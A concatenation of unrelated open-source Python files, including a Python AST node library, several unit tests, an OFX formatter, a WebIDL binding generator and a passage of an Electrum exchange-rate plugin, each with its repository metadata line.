A function call, e.g. ``f(x, y=1, *z, **t)``.
:ivar func: (:class:`AST`) function to call
:ivar args: (list of :class:`AST`) regular arguments
:ivar keywords: (list of :class:`keyword`) keyword arguments
:ivar starargs: (:class:`AST`) splat argument (if any), e.g. in ``*x``
:ivar kwargs: (:class:`AST`) keyword splat argument (if any), e.g. in ``**x``
:ivar star_loc: location of ``*``, if any
:ivar dstar_loc: location of ``**``, if any
"""
_fields = ("func", "args", "keywords", "starargs", "kwargs")
_locs = beginendloc._locs + ("star_loc", "dstar_loc")
class Compare(expr):
"""
A comparison operation, e.g. ``x < y`` or ``x < y > z``.
:ivar left: (:class:`AST`) left-hand
:ivar ops: (list of :class:`cmpop`) compare operators
:ivar comparators: (list of :class:`AST`) compare values
"""
_fields = ("left", "ops", "comparators")
class Dict(expr, beginendloc):
"""
A dictionary, e.g. ``{x: y}``.
:ivar keys: (list of :class:`AST`) keys
:ivar values: (list of :class:`AST`) values
:ivar colon_locs: locations of ``:``
"""
_fields = ("keys", "values")
_locs = beginendloc._locs + ("colon_locs",)
class DictComp(expr, beginendloc):
"""
A list comprehension, e.g. ``{x: y for x,y in z}``.
**Emitted since 2.7.**
:ivar key: (:class:`AST`) key part of comprehension body
:ivar value: (:class:`AST`) value part of comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
:ivar colon_loc: location of ``:``
"""
_fields = ("key", "value", "generators")
_locs = beginendloc._locs + ("colon_loc",)
class Ellipsis(expr):
"""The ellipsis, e.g. in ``x[...]``."""
class GeneratorExp(expr, beginendloc):
"""
A generator expression, e.g. ``(x for x in y)``.
:ivar elt: (:class:`AST`) expression body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class IfExp(expr):
"""
A conditional expression, e.g. ``x if y else z``.
:ivar test: (:class:`AST`) condition
:ivar body: (:class:`AST`) value if true
:ivar orelse: (:class:`AST`) value if false
:ivar if_loc: location of ``if``
:ivar else_loc: location of ``else``
"""
_fields = ("test", "body", "orelse")
_locs = expr._locs + ("if_loc", "else_loc")
class Lambda(expr):
"""
A lambda expression, e.g. ``lambda x: x*x``.
:ivar args: (:class:`arguments`) arguments
:ivar body: (:class:`AST`) body
:ivar lambda_loc: location of ``lambda``
:ivar colon_loc: location of ``:``
"""
_fields = ("args", "body")
_locs = expr._locs + ("lambda_loc", "colon_loc")
class List(expr, beginendloc):
"""
A list, e.g. ``[x, y]``.
:ivar elts: (list of :class:`AST`) elements
"""
_fields = ("elts", "ctx")
class ListComp(expr, beginendloc):
"""
A list comprehension, e.g. ``[x for x in y]``.
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Name(expr):
"""
An identifier, e.g. ``x``.
:ivar id: (string) name
"""
_fields = ("id", "ctx")
class NameConstant(expr):
"""
A named constant, e.g. ``None``.
:ivar value: Python value, one of ``None``, ``True`` or ``False``
"""
_fields = ("value",)
class Num(expr):
"""
An integer, floating point or complex number, e.g. ``1``, ``1.0`` or ``1.0j``.
:ivar n: (int, float or complex) value
"""
_fields = ("n",)
class Repr(expr, beginendloc):
"""
A repr operation, e.g. ``\`x\```
**Emitted until 3.0.**
:ivar value: (:class:`AST`) value
"""
_fields = ("value",)
class Set(expr, beginendloc):
"""
A set, e.g. ``{x, y}``.
**Emitted since 2.7.**
:ivar elts: (list of :class:`AST`) elements
"""
_fields = ("elts",)
class SetComp(expr, beginendloc):
"""
A set comprehension, e.g. ``{x for x in y}``.
**Emitted since 2.7.**
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Str(expr, beginendloc):
"""
A string, e.g. ``"x"``.
:ivar s: (string) value
"""
_fields = ("s",)
class Starred(expr):
"""
A starred expression, e.g. ``*x`` in ``*x, y = z``.
:ivar value: (:class:`AST`) expression
:ivar star_loc: location of ``*``
"""
_fields = ("value", "ctx")
_locs = expr._locs + ("star_loc",)
class Subscript(expr, beginendloc):
"""
A subscript operation, e.g. ``x[1]``.
:ivar value: (:class:`AST`) object being sliced
:ivar slice: (:class:`slice`) slice
"""
_fields = ("value", "slice", "ctx")
class Tuple(expr, beginendloc):
"""
A tuple, e.g. ``(x,)`` or ``x,y``.
:ivar elts: (list of nodes) elements
"""
_fields = ("elts", "ctx")
class UnaryOp(expr):
"""
An unary operation, e.g. ``+x``.
:ivar op: (:class:`unaryop`) operator
:ivar operand: (:class:`AST`) operand
"""
_fields = ("op", "operand")
class Yield(expr):
"""
A yield expression, e.g. ``yield x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc",)
class YieldFrom(expr):
"""
A yield from expression, e.g. ``yield from x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
:ivar from_loc: location of ``from``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc", "from_loc")
# expr_context
# AugLoad
# AugStore
# Del
# Load
# Param
# Store
class keyword(AST, commonloc):
"""
A keyword actual argument, e.g. in ``f(x=1)``.
:ivar arg: (string) name
:ivar value: (:class:`AST`) value
:ivar equals_loc: location of ``=``
"""
_fields = ("arg", "value")
_locs = commonloc._locs + ("arg_loc", "equals_loc")
class mod(AST, commonloc):
"""Base class for modules (groups of statements)."""
_fields = ("body",)
class Expression(mod):
"""A group of statements parsed as if for :func:`eval`."""
class Interactive(mod):
"""A group of statements parsed as if it was REPL input."""
class Module(mod):
"""A group of statements parsed as if it was a file."""
class operator(AST, commonloc):
"""Base class for numeric binary operators."""
class Add(operator):
"""The ``+`` operator."""
class BitAnd(operator):
"""The ``&`` operator."""
class BitOr(operator):
"""The ``|`` operator."""
class BitXor(operator):
"""The ``^`` operator."""
class Div(operator):
"""The ``\\`` operator."""
class FloorDiv(operator):
"""The ``\\\\`` operator."""
class LShift(operator):
"""The ``<<`` operator."""
class MatMult(operator):
"""The ``@`` operator."""
class Mod(operator):
"""The ``%`` operator."""
class Mult(operator):
"""The ``*`` operator."""
class Pow(operator):
"""The ``**`` operator."""
class RShift(operator):
"""The ``>>`` operator."""
class Sub(operator):
"""The ``-`` operator."""
class slice(AST, commonloc):
"""Base class for slice operations."""
class ExtSlice(slice):
"""
The multiple slice, e.g. in ``x[0:1, 2:3]``.
Note that multiple slices with only integer indexes
will appear as instances of :class:`Index`.
:ivar dims: (:class:`slice`) sub-slices
"""
_fields = ("dims",)
class Index(slice):
"""
The index, e.g. in ``x[1]`` or ``x[1, 2]``.
:ivar value: (:class:`AST`) index
"""
_fields = ("value",)
class Slice(slice):
"""
The slice, e.g. in ``x[0:1]`` or ``x[0:1:2]``.
:ivar lower: (:class:`AST`) lower bound, if any
:ivar upper: (:class:`AST`) upper bound, if any
:ivar step: (:class:`AST`) iteration step, if any
:ivar bound_colon_loc: location of first semicolon
:ivar step_colon_loc: location of second semicolon, if any
"""
_fields = ("lower", "upper", "step")
_locs = slice._locs + ("bound_colon_loc", "step_colon_loc")
class stmt(AST, commonloc):
"""Base class for statement nodes."""
class Assert(stmt, keywordloc):
"""
The ``assert x, msg`` statement.
:ivar test: (:class:`AST`) condition
:ivar msg: (:class:`AST`) message, if any
"""
_fields = ("test", "msg")
class Assign(stmt):
"""
The ``=`` statement, e.g. in ``x = 1`` or ``x = y = 1``.
:ivar targets: (list of assignable :class:`AST`) left-hand sides
:ivar value: (:class:`AST`) right-hand side
:ivar op_locs: location of equality signs corresponding to ``targets``
"""
_fields = ("targets", "value")
_locs = stmt._locs + ("op_locs",)
class AugAssign(stmt):
"""
The operator-assignment statement, e.g. ``+=``.
:ivar target: (assignable :class:`AST`) left-hand side
:ivar op: (:class:`operator`) operator
:ivar value: (:class:`AST`) right-hand side
"""
_fields = ("target", "op", "value")
class Break(stmt, keywordloc):
"""The ``break`` statement."""
class ClassDef(stmt, keywordloc):
"""
The ``class x(z, y):· t`` (2.6) or
``class x(y, z=1, *t, **u):· v`` (3.0) statement.
:ivar name: (string) name
:ivar bases: (list of :class:`AST`) base classes
:ivar keywords: (list of :class:`keyword`) keyword arguments; **emitted since 3.0**
:ivar starargs: (:class:`AST`) splat argument (if any), e.g. in ``*x``; **emitted since 3.0**
:ivar kwargs: (:class:`AST`) keyword splat argument (if any), e.g. in ``**x``; **emitted since 3.0**
:ivar body: (list of :class:`AST`) body
:ivar decorator_list: (list of :class:`AST`) decorators
:ivar keyword_loc: location of ``class``
:ivar name_loc: location of name
:ivar lparen_loc: location of ``(``, if any
:ivar star_loc: location of ``*``, if any; **emitted since 3.0**
:ivar dstar_loc: location of ``**``, if any; **emitted since 3.0**
:ivar rparen_loc: location of ``)``, if any
:ivar colon_loc: location of ``:``
:ivar at_locs: locations of decorator ``@``
"""
_fields = ("name", "bases", "keywords", "starargs", "kwargs", "body", "decorator_list")
_locs = keywordloc._locs + ("name_loc", "lparen_loc", "star_loc", "dstar_loc", "rparen_loc",
"colon_loc", "at_locs")
class Continue(stmt, keywordloc):
"""The ``continue`` statement."""
class Delete(stmt, keywordloc):
"""
The ``del x, y`` statement.
:ivar targets: (list of :class:`Name`)
"""
_fields = ("targets",)
class Exec(stmt, keywordloc):
"""
The ``exec code in locals, globals`` statement.
**Emitted until 3.0.**
:ivar body: (:class:`AST`) code
:ivar locals: (:class:`AST`) locals
:ivar globals: (:class:`AST`) globals
:ivar keyword_loc: location of ``exec``
:ivar in_loc: location of ``in``
"""
_fields = ("body", "locals", "globals")
_locs = keywordloc._locs + ("in_loc",)
class Expr(stmt):
"""
An expression in statement context. The value of expression is discarded.
:ivar value: (:class:`expr`) value
"""
_fields = ("value",)
class For(stmt, keywordloc):
"""
The ``for x in y:· z·else:· t`` statement.
:ivar target: (assignable :class:`AST`) loop variable
:ivar iter: (:class:`AST`) loop collection
:ivar body: (list of :class:`AST`) code for every iteration
:ivar orelse: (list of :class:`AST`) code if empty
:ivar keyword_loc: location of ``for``
:ivar in_loc: location of ``in``
:ivar for_colon_loc: location of colon after ``for``
:ivar else_loc: location of ``else``, if any
:ivar else_colon_loc: location of colon after ``else``, if any
"""
_fields = ("target", "iter", "body", "orelse")
_locs = keywordloc._locs + ("in_loc", "for_colon_loc", "else_loc", "else_colon_loc")
class FunctionDef(stmt, keywordloc):
"""
The ``def f(x):· y`` (2.6) or ``def f(x) -> t:· y`` (3.0) statement.
:ivar name: (string) name
:ivar args: (:class:`arguments`) formal arguments
:ivar returns: (:class:`AST`) return type annotation; **emitted since 3.0**
:ivar body: (list of :class:`AST`) body
:ivar decorator_list: (list of :class:`AST`) decorators
:ivar keyword_loc: location of ``def``
:ivar name_loc: location of name
:ivar arrow_loc: location of ``->``, if any; **emitted since 3.0**
:ivar colon_loc: location of ``:``, if any
:ivar at_locs: locations of decorator ``@``
"""
_fields = ("name", "args", "returns", "body", "decorator_list")
_locs = keywordloc._locs + ("name_loc", "arrow_loc", "colon_loc", "at_locs")
class Global(stmt, keywordloc):
"""
The ``global x, y`` statement.
:ivar names: (list of string) names
:ivar name_locs: locations of names
"""
_fields = ("names",)
_locs = keywordloc._locs + ("name_locs",)
class If(stmt, keywordloc):
"""
The ``if x:· y·else:· z`` or ``if x:· y·elif: z· t`` statement.
:ivar test: (:class:`AST`) condition
:ivar body: (list of :class:`AST`) code if true
:ivar orelse: (list of :class:`AST`) code if false
:ivar if_colon_loc: location of colon after ``if`` or ``elif``
:ivar else_loc: location of ``else``, if any
:ivar else_colon_loc: location of colon after ``else``, if any
"""
_fields = ("test", "body", "orelse")
_locs = keywordloc._locs + ("if_colon_loc", "else_loc", "else_colon_loc")
class Import(stmt, keywordloc):
"""
The ``import x, y`` statement.
:ivar names: (list of :class:`alias`) names
"""
_fields = ("names",)
class ImportFrom(stmt, keywordloc):
"""
The ``from ...x import y, z`` or ``from x import (y, z)`` or
``from x import *`` statement.
:ivar names: (list of :class:`alias`) names
:ivar module: (string) module name, if any
:ivar level: (integer) amount of dots before module name
:ivar keyword_loc: location of ``from``
:ivar dots_loc: location of dots, if any
:ivar module_loc: location of module name, if any
:ivar import_loc: location of ``import``
:ivar lparen_loc: location of ``(``, if any
:ivar rparen_loc: location of ``)``, if any
"""
_fields = ("names", "module", "level")
_locs = keywordloc._locs + ("dots_loc", "module_loc", "import_loc", "lparen_loc", "rparen_loc")
class Nonlocal(stmt, keywordloc):
"""
The ``nonlocal x, y`` statement.
**Emitted since 3.0.**
:ivar names: (list of string) names
:ivar name_locs: locations of names
"""
_fields = ("names",)
_locs = keywordloc._locs + ("name_locs",)
class Pass(stmt, keywordloc):
"""The ``pass`` statement."""
class Print(stmt, keywordloc):
"""
The ``print >>x, y, z,`` statement.
**Emitted until 3.0 or until print_function future flag is activated.**
:ivar dest: (:class:`AST`) destination stream, if any
:ivar values: (list of :class:`AST`) values to print
:ivar nl: (boolean) whether to print newline after values
:ivar dest_loc: location of ``>>``
"""
_fields = ("dest", "values", "nl")
_locs = keywordloc._locs + ("dest_loc",)
class Raise(stmt, keywordloc):
"""
The ``raise exc, arg, traceback`` (2.6) or
or ``raise exc from cause`` (3.0) statement.
:ivar exc: (:class:`AST`) exception type or instance
:ivar cause: (:class:`AST`) cause of exception, if any; **emitted since 3.0**
:ivar inst: (:class:`AST`) exception instance or argument list, if any; **emitted until 3.0**
:ivar tback: (:class:`AST`) traceback, if any; **emitted until 3.0**
:ivar from_loc: location of ``from``, if any; **emitted since 3.0**
"""
_fields = ("exc", "cause", "inst", "tback")
_locs = keywordloc._locs + ("from_loc",)
class Return(stmt, keywordloc):
"""
The ``return x`` statement.
:ivar value: (:class:`AST`) return value, if any
"""
_fields = ("value",)
class Try(stmt, keywordloc):
"""
The ``try:· x·except y:· z·else:· t`` or
``try:· x·finally:· y`` statement.
:ivar body: (list of :class:`AST`) code to try
:ivar handlers: (list of :class:`ExceptHandler`) exception handlers
:ivar orelse: (list of :class:`AST`) code if no exception
:ivar finalbody: (list of :class:`AST`) code to finalize
:ivar keyword_loc: location of ``try``
:ivar try_colon_loc: location of ``:`` after ``try``
:ivar else_loc: location of ``else``
:ivar else_colon_loc: location of ``:`` after ``else``
:ivar finally_loc: location of ``finally``
:ivar finally_colon_loc: location of ``:`` after ``finally``
"""
_fields = ("body", "handlers", "orelse", "finalbody")
_locs = keywordloc._locs + ("try_colon_loc", "else_loc", "else_colon_loc",
"finally_loc", "finally_colon_loc",)
class While(stmt, keywordloc):
"""
The ``while x:· y·else:· z`` statement.
:ivar test: (:class:`AST`) condition
:ivar body: (list of :class:`AST`) code for every iteration
:ivar orelse: (list of :class:`AST`) code if empty
:ivar keyword_loc: location of ``while``
:ivar while_colon_loc: location of colon after ``while``
:ivar else_loc: location of ``else``, if any
:ivar else_colon_loc: location of colon after ``else``, if any
"""
_fields = ("test", "body", "orelse")
_locs = keywordloc._locs + ("while_colon_loc", "else_loc", "else_colon_loc")
class With(stmt, keywordloc):
"""
The ``with x as y:· z`` statement.
:ivar items: (list of :class:`withitem`) bindings
:ivar body: (:class:`AST`) body
:ivar keyword_loc: location of ``with``
:ivar colon_loc: location of ``:``
"""
_fields = ("items", "body")
_locs = keywordloc._locs + ("colon_loc",)
class unaryop(AST, commonloc):
"""Base class for unary numeric and boolean operators."""
class Invert(unaryop):
"""The ``~`` operator."""
class Not(unaryop):
"""The ``not`` operator."""
class UAdd(unaryop):
"""The unary ``+`` operator."""
class USub(unaryop):
"""The unary ``-`` operator."""
class withitem(AST, commonloc):
"""
The ``x as y`` clause in ``with x as y:``.
:ivar context_expr: (:class:`AST`) context
:ivar optional_vars: (assignable :class:`AST`) context binding, if any
:ivar as_loc: location of ``as``, if any
"""
_fields = ("context_expr", "optional_vars")
_locs = commonloc._locs + ("as_loc",)
| google/grumpy | third_party/pythonparser/ast.py | Python | apache-2.0 | 26,727 | 0.005131 |
#! /usr/bin/env python
# @brief Script to run apropriate tests.
import os
import distutils.core
from shutil import rmtree, copyfile
"""Avaiable tests dictionary in the format no_of_test : name_of_test"""
tests = {0:"default Generator.dat with lot of comments and explanations",
1:"RHIC pt_pi, eta_pi; tecm = 200GeV; Lambda2=1",
2:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1",
3:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6",
4:"RHIC pt_pi, eta_pi; tecm = 500GeV; Lambda2=1",
5:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1",
6:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1.6",
7:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.2",
8:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.6",
9:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.2",
10:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.6",
11:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.2",
12:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.6",
13:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.2",
14:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.6",
15:"2to5; y_pi, tecm = 200GeV",
16:"CPS, N=5, y_pi, tecm = 200GeV",
17:"2to5; y_pi, t, tecm = 200GeV",
18:"CPS, N=5, y_pi, t, tecm = 200GeV",
19:"CPS, N=5, Exploration Cuts, y_pi, t, tecm = 200GeV",
20:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; LS method of Phase Space generation",
21:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; 2toN (N=4) method of Phase Space generation",
22:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 1000 = nSampl, y in [-8;8]",
23:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-8;8]",
24:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 10000, y in [-8;8]",
25:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-2;2]",
26:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000 = nSampl, y in [-2;2]"
}
def prepareTest( number, testDir = './Tests', testName = 'test', configFile = 'Generator.dat' ):
"""Prepare configuration file by picking one of the test file from testDir
@param testDir dir containing tests
@param testName basename of test
@param configFile configuration file for generator
"""
#save old config file
copyfile(configFile, "OLD"+configFile)
#copy configuration files
fromDirectory = testDir + '/' + testName + str(number)
copyfile(fromDirectory, configFile)
return testDir
def rmDir( directory = "./" ):
"""Remove directory and all its content
@param directory base directory for project
"""
rmtree( directory )
def runMake( option, runDir = './'):
"""Run make with option in given directory
@param option option for make
@param runDir directory in which make will be executed
"""
os.system( 'make -C ' + runDir + ' ' + option)
def showTests( testDict ):
"""Show tests in dictionary
@param testDict dictionary with tests in the format no_of_test : name_of_test
"""
print("#########################")
print("AVAIBLE TESTS:")
print("#########################")
for key in testDict:
print( str(key) + ' -- '+ str(testDict[key]) )
print("#########################")
def pickTest( testDict ):
"""Allows user to pick option from the keys of dictionary and returns it
@param testDict dictionary with tests in the format no_of_test : name_of_test
"""
finish = False
while not finish:
showTests(testDict)
input_var = input("Enter option: ")
print ("you entered " + str(input_var))
if input_var in testDict.keys():
finish = True
return input_var
def main():
"""Simple test suit for GenEx. It copy Core GenEx files and selected
configuration files to one test directory and then run it and remove test directory"""
testNo = pickTest( tests )
print("Preparing generator...")
prepareTest(testNo)
print("...DONE")
print("Start test...")
runMake('run')
print("...DONE")
print("Cleaning dir...")
runMake('clean')
print("...DONE")
if __name__ == "__main__":
main()
| rkycia/GenEx | test.py | Python | gpl-3.0 | 4,308 | 0.036444 |
#!/usr/bin/python
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
# The unittest framwork doesn't play nice with pylint:
# pylint: disable-msg=C0103
from __future__ import absolute_import
import unittest
from svtplay_dl.service.oppetarkiv import OppetArkiv
from svtplay_dl.service.tests import HandlesURLsTestMixin
class handlesTest(unittest.TestCase, HandlesURLsTestMixin):
service = OppetArkiv
urls = {"ok": ["http://www.oppetarkiv.se/video/1129844/jacobs-stege-avsnitt-1-av-1"], "bad": ["http://www.svtplay.se/video/1090393/del-9"]}
| olof/svtplay-dl | lib/svtplay_dl/service/tests/oppetarkiv.py | Python | mit | 591 | 0.001692 |
#!/usr/bin/env python
# Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Samba Python tests."""
import ldb
import os
import samba
from samba.tests import TestCase, TestCaseInTempDir
class SubstituteVarTestCase(TestCase):
def test_empty(self):
self.assertEquals("", samba.substitute_var("", {}))
def test_nothing(self):
self.assertEquals("foo bar",
samba.substitute_var("foo bar", {"bar": "bla"}))
def test_replace(self):
self.assertEquals("foo bla",
samba.substitute_var("foo ${bar}", {"bar": "bla"}))
def test_broken(self):
self.assertEquals("foo ${bdkjfhsdkfh sdkfh ",
samba.substitute_var("foo ${bdkjfhsdkfh sdkfh ", {"bar": "bla"}))
def test_unknown_var(self):
self.assertEquals("foo ${bla} gsff",
samba.substitute_var("foo ${bla} gsff", {"bar": "bla"}))
def test_check_all_substituted(self):
samba.check_all_substituted("nothing to see here")
self.assertRaises(Exception, samba.check_all_substituted,
"Not subsituted: ${FOOBAR}")
class LdbExtensionTests(TestCaseInTempDir):
def test_searchone(self):
path = self.tempdir + "/searchone.ldb"
l = samba.Ldb(path)
try:
l.add({"dn": "foo=dc", "bar": "bla"})
self.assertEquals("bla",
l.searchone(basedn=ldb.Dn(l, "foo=dc"), attribute="bar"))
finally:
del l
os.unlink(path)
| wimberosa/samba | source4/scripting/python/samba/tests/core.py | Python | gpl-3.0 | 2,175 | 0.004598 |
#coding: utf-8
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ofx.document - abstract OFX document.
#
import xml.sax.saxutils as sax
class Document:
def as_xml(self, original_format=None, date_format=None):
"""Formats this document as an OFX 2.0 XML document."""
xml = ""
# NOTE: Encoding in OFX, particularly in OFX 1.02,
# is kind of a mess. The OFX 1.02 spec talks about "UNICODE"
# as a supported encoding, which the OFX 2.0 spec has
# back-rationalized to "UTF-8". The "US-ASCII" encoding is
# given as "USASCII". Yet the 1.02 spec acknowledges that
# not everyone speaks English nor uses UNICODE, so they let
# you throw any old encoding in there you'd like. I'm going
# with the idea that if the most common encodings are named
# in an OFX file, they should be translated to "real" XML
# encodings, and if no encoding is given, UTF-8 (which is a
# superset of US-ASCII) should be assumed; but if a named
# encoding other than USASCII or 'UNICODE' is given, that
# should be preserved. I'm also adding a get_encoding()
# method so that we can start to survey what encodings
# we're actually seeing, and use that to maybe be smarter
# about this in the future.
#forcing encoding to utf-8
encoding = "UTF-8"
xml += """<?xml version="1.0" encoding="%s"?>\n""" % encoding
xml += """<?OFX OFXHEADER="200" VERSION="200" """ + \
"""SECURITY="%s" OLDFILEUID="%s" NEWFILEUID="%s"?>\n""" % \
(self.parse_dict["header"]["SECURITY"],
self.parse_dict["header"]["OLDFILEUID"],
self.parse_dict["header"]["NEWFILEUID"])
if original_format is not None:
xml += """<!-- Converted from: %s -->\n""" % original_format
if date_format is not None:
xml += """<!-- Date format was: %s -->\n""" % date_format
taglist = self.parse_dict["body"]["OFX"][0].asList()
xml += self._format_xml(taglist)
return xml
def _format_xml(self, mylist, indent=0):
xml = ""
indentstring = " " * indent
tag = mylist.pop(0)
if len(mylist) > 0 and isinstance(mylist[0], list):
xml += "%s<%s>\n" % (indentstring, tag)
for value in mylist:
xml += self._format_xml(value, indent=indent + 2)
xml += "%s</%s>\n" % (indentstring, tag)
elif len(mylist) > 0:
# Unescape then reescape so we don't wind up with '&lt;', oy.
value = sax.escape(sax.unescape(mylist[0]))
xml += "%s<%s>%s</%s>\n" % (indentstring, tag, value, tag)
return xml
| henriquebastos/fixofx | fixofx/ofx/document.py | Python | apache-2.0 | 3,289 | 0.001216 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import cPickle
import WebIDL
from Configuration import *
from Codegen import CGBindingRoot, replaceFileIfChanged
# import Codegen in general, so we can set a variable on it
import Codegen
def generate_binding_header(config, outputprefix, webidlfile):
"""
|config| Is the configuration object.
|outputprefix| is a prefix to use for the header guards and filename.
"""
filename = outputprefix + ".h"
root = CGBindingRoot(config, outputprefix, webidlfile)
if replaceFileIfChanged(filename, root.declare()):
print "Generating binding header: %s" % (filename)
def generate_binding_cpp(config, outputprefix, webidlfile):
"""
|config| Is the configuration object.
|outputprefix| is a prefix to use for the header guards and filename.
"""
filename = outputprefix + ".cpp"
root = CGBindingRoot(config, outputprefix, webidlfile)
if replaceFileIfChanged(filename, root.define()):
print "Generating binding implementation: %s" % (filename)
def main():
# Parse arguments.
from optparse import OptionParser
usagestring = "usage: %prog [header|cpp] configFile outputPrefix webIDLFile"
o = OptionParser(usage=usagestring)
o.add_option("--verbose-errors", action='store_true', default=False,
help="When an error happens, display the Python traceback.")
(options, args) = o.parse_args()
if len(args) != 4 or (args[0] != "header" and args[0] != "cpp"):
o.error(usagestring)
buildTarget = args[0]
configFile = os.path.normpath(args[1])
outputPrefix = args[2]
webIDLFile = os.path.normpath(args[3])
# Load the parsing results
f = open('ParserResults.pkl', 'rb')
parserData = cPickle.load(f)
f.close()
# Create the configuration data.
config = Configuration(configFile, parserData)
# Generate the prototype classes.
if buildTarget == "header":
generate_binding_header(config, outputPrefix, webIDLFile);
elif buildTarget == "cpp":
generate_binding_cpp(config, outputPrefix, webIDLFile);
else:
assert False # not reached
if __name__ == '__main__':
main()
| sergecodd/FireFox-OS | B2G/gecko/dom/bindings/BindingGen.py | Python | apache-2.0 | 2,361 | 0.003388 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import datetime
import decimal
import httplib
import json
import threading
import re
from decimal import Decimal
from electrum.plugins import BasePlugin
from electrum.i18n import _
from electrum_gui.qt.util import *
EXCHANGES = ["BitcoinAverage",
"BitcoinVenezuela",
"BitPay",
"Blockchain",
"BTCChina",
"CaVirtEx",
"Coinbase",
"CoinDesk",
"LocalBitcoins",
"Winkdex"]
class Exchanger(threading.Thread):
def __init__(self, parent):
threading.Thread.__init__(self)
self.daemon = True
self.parent = parent
self.quote_currencies = None
self.lock = threading.Lock()
self.query_rates = threading.Event()
self.use_exchange = self.parent.config.get('use_exchange', "Blockchain")
self.parent.exchanges = EXCHANGES
self.parent.currencies = ["EUR","GBP","USD"]
self.parent.win.emit(SIGNAL("refresh_exchanges_combo()"))
self.parent.win.emit(SIGNAL("refresh_currencies_combo()"))
self.is_running = False
def get_json(self, site, get_string):
try:
connection = httplib.HTTPSConnection(site)
connection.request("GET", get_string)
except Exception:
raise
resp = connection.getresponse()
if resp.reason == httplib.responses[httplib.NOT_FOUND]:
raise
try:
json_resp = json.loads(resp.read())
except Exception:
raise
return json_resp
def exchange(self, btc_amount, quote_currency):
with self.lock:
if self.quote_currencies is None:
return None
quote_currencies = self.quote_currencies.copy()
if quote_currency not in quote_currencies:
return None
if self.use_exchange == "CoinDesk":
try:
resp_rate = self.get_json('api.coindesk.com', "/v1/bpi/currentprice/" + str(quote_currency) + ".json")
except Exception:
return
return btc_amount * decimal.Decimal(str(resp_rate["bpi"][str(quote_currency)]["rate_float"]))
return btc_amount * decimal.Decimal(quote_currencies[quote_currency])
def stop(self):
self.is_running = False
def update_rate(self):
self.use_exchange = self.parent.config.get('use_exchange', "Blockchain")
update_rates = {
"BitcoinAverage": self.update_ba,
"BitcoinVenezuela": self.update_bv,
"BitPay": self.update_bp,
"Blockchain": self.update_bc,
"BTCChina": self.update_CNY,
"CaVirtEx": self.update_cv,
"CoinDesk": self.update_cd,
"Coinbase": self.update_cb,
"LocalBitcoins": self.update_lb,
"Winkdex": self.update_wd,
}
try:
update_rates[self.use_exchange]()
except KeyError:
return
def run(self):
self.is_running = True
while self.is_running:
self.query_rates.clear()
self.update_rate()
self.query_rates.wait(150)
def update_cd(self):
try:
resp_currencies = self.get_json('api.coindesk.com', "/v1/bpi/supported-currencies.json")
except Exception:
return
quote_currencies = {}
for cur in resp_currencies:
quote_currencies[str(cur["currency"])] = 0.0
with self.lock:
self.quote_currencies = quote_currencies
self.parent.set_currencies(quote_currencies)
def update_wd(self):
try:
winkresp = self.get_json('winkdex.com', "/static/data/0_600_288.json")
####could need nonce value in GET, no Docs available
except Exception:
return
quote_currencies = {"USD": 0.0}
####get y of highest x in "prices"
